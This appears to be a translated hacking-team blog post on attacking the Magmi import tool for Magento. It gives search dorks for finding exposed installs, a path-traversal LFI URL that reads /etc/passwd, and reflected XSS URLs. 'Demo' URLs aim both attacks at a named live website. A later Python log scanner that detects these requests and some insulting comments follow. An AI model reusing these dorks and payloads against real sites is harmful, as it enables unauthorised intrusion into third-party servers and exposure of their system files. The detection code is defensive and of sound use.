Hi ART-Team family :)
This time I want to share a tutorial that I myself am still confused about how to use >_<
[+] DORK :
inurl:/media/magmi/magmi/web/
inurl:/web/magmi_import_run.php
inurl:/old-site/magmi/web/
inurl:/magmi/web/magmi.php?
index of /media/magmi/magmi/web/css/
[+] VULN :
[+] EXPLOIT LFI :
www.NDAS.mu/[path]/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
[+] EXPLOIT XSS :
www.NDAS.mu/[path]/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27HACKED by _MisterNotFound_%27%29;%3C/script%3E
www.NDAS.mu/[path]/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27HACKED by _MisterNotFound_%27%29;%3C/script%3E
[+] DEMO LFI :
http://www.gooddrop.com.au/media/magmi/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
[+] DEMO XSS :
http://www.gooddrop.com.au/media/magmi/magmi/web/magmi_import_run.php?%3C%2Fscript%3E%3Cscript%3Ealert%28%27HACKED+by+_MisterNotFound_%27%29%3B%3C%2Fscript%3E
That's all for this tutorial from _MisterNotFound_
Have a blessed Ramadan fast ;)
Don't forget to like our team's fan page on Facebook ;)
Thank you.
Wassalamualaikum Wr. Wb.
Author: _MisterNotFound_
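A defender-side check for the request shapes listed above, as an added example that is not part of the original post: it scans web-server access logs for the `ajax_pluginconf.php` `file=` traversal and for `<script>` injected into the query string of the Magmi pages. The log lines, function names and verdict labels are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /media/magmi/magmi/web/ajax_pluginconf.php'
    '?file=..%2F..%2F..%2Fetc%2Fpasswd&plugintype=utilities&pluginclass=CustomSQLUtility HTTP/1.1" 200 1532',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /magmi/web/ajax_pluginconf.php'
    '?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd&plugintype=utilities HTTP/1.1" 200 1532',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /media/magmi/magmi/web/magmi_import_run.php'
    '?%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2024:10:01:05 +0000] "GET /magmi/web/magmi.php'
    '?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 4410',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /magmi/web/magmi.php?configstep=2&profile=default HTTP/1.1" 200 4410',
    '198.51.100.7 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php?file=report.pdf HTTP/1.1" 200 9000',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MAGMI_RE = re.compile(r"/magmi/web/([\w.-]+\.php)$", re.I)
SCRIPT_RE = re.compile(r"<\s*/?\s*script", re.I)

def fully_decode(value, rounds=3):
    """Undo nested URL-encoding (%252e -> %2e -> .) before matching."""
    for _ in range(rounds):
        value = unquote_plus(value)
    return value

def classify(line):
    """Return 'lfi', 'xss', 'magmi-access' or None for one access-log line."""
    m = REQUEST_RE.search(line)
    url = urlsplit(m.group(1)) if m else None
    script = MAGMI_RE.search(url.path) if url else None
    if not script:
        return None  # not a request to the Magmi web directory
    if script.group(1).lower() == "ajax_pluginconf.php":
        params = dict(parse_qsl(url.query, keep_blank_values=True))
        file_arg = fully_decode(params.get("file", "")).replace("\\", "/")
        if "../" in file_arg or file_arg.startswith("/"):
            return "lfi"  # file= escapes the plugin directory
    if SCRIPT_RE.search(fully_decode(url.query)):
        return "xss"  # script tag reflected from the query string
    return "magmi-access"  # Magmi UI reached at all; review who can reach it

def scan(lines):
    """Return (1-based line number, verdict) for every flagged line."""
    hits = ((i, classify(line)) for i, line in enumerate(lines, 1))
    return [(i, verdict) for i, verdict in hits if verdict]
```

Any `magmi-access` hit from an address outside the administrators' network means the import tool's web directory is exposed and should be moved behind authentication or removed.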
5 comments
Bro, I don't understand.
Shitty blog, makes no sense. Are you trying to show off or what?
You dick, you just don't get it, idiot.
Do it properly, man.
Do it properly, man.